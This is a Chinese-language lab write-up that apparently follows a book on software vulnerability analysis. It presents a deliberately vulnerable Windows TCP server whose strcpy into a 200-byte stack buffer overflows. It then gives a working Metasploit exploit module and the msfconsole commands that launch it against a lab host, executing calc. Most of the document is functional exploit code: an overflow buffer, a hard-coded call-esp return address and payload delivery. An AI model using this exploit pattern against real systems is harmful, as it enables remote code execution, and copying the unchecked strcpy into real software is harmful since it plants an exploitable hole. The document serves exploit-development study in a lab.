[0day安全:软件漏洞分析技术] 傻瓜式 Exploit开发

照着书上的漏洞程序,简单实现一下msf的exploit开发

  • 实验环境
  • 靶机:windows10 ip:10.211.55.3
  • 攻击机:kali3
  • 攻击工具:metasploit

  • 程序是一个非常简易的TCp socket程序,会在7777端口监听TCP链接,收到数据就在屏幕上打印出来,存在栈溢出漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#漏洞点,strcpy函数造成的栈溢出
void msg_display(char * buf)
{
char msg[200];
strcpy(msg,buf);// overflow here, copy 0x200 to 200
cout<<"********************"<<endl;
cout<<"received:"<<endl;
cout<<msg<<endl;
}

void main()
{
int sock,msgsock,lenth,receive_len;
struct sockaddr_in sock_server,sock_client;
char buf[0x200]; //noticed it is 0x200
...

然后在msf的exploits目录下新建一个文件夹用于存储我们的exp

  • rest.rbz
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#!/usr/bin/env ruby
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'security test',
'Description' => %q{
This module exploits a buffer overflow.
},
'Author' => 'hacker_mao',
'Payload' =>
{
'Space' => 300,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 10', { 'Ret' => 0x753FF9D3 } ],
]))
end

def exploit
connect
attack_buf = 'a'*200
attack_buf += [target['Ret']].pack('V')
attack_buf += payload.encoded
sock.put(attack_buf)
handler
disconnect
end
end
  • 上面exp中的ret地址其实是call esp的地址,需要我们去自己系统找,可以利用OD的插件OllyUni.dll来进行查找,这里我们随便选了个0x753FF9D3处的

  • 然后直接上msf,一把梭
1
2
3
4
5
6
7
8
9
root@kali:~# msfconsole
msf > use exploit/test/test
msf exploit(test/test) > set target 0
msf exploit(test/test) > set payload windows/exec
msf exploit(test/test) > set rhost 10.211.55.3
msf exploit(test/test) > set rport 7777
msf exploit(test/test) > set cmd calc
msf exploit(test/test) > set exitfunc seh
msf exploit(test/test) > exploit

  • 成功执行calc命令